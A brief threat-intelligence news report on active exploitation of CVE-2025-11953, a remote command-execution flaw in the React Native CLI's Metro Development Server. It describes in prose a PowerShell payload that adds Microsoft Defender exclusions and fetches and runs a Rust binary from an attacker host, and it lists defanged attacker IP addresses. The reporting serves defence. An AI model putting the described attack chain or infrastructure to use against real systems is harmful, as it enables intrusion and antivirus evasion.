THREAT actors have been observed exploiting a critical flaw in the Metro Development Server within the React Native CLI npm package, tracked as CVE-2025-11953 (Metro4Shell). According to VulnCheck, exploitation first appeared on 21 December 2025, with a CVSS score of 9.8, enabling remote unauthenticated attackers to execute arbitrary operating system commands on the host.
In the honeypot attack detected, the payload is a Base64-encoded PowerShell script that can, among other actions, add Microsoft Defender Antivirus exclusions for the current working directory and the temporary folder, and then establish a raw TCP connection to an attacker-controlled host at 8.218.43[.]248:60124 to retrieve and execute data. The downloaded binary, based in Rust, includes anti‑analysis checks to hinder static inspection.
VulnCheck noted activity from several IP addresses, including 5.109.182[.]231, 223.6.249[.]141, and 134.209.69[.]155, describing the campaign as operational rather than merely experimental.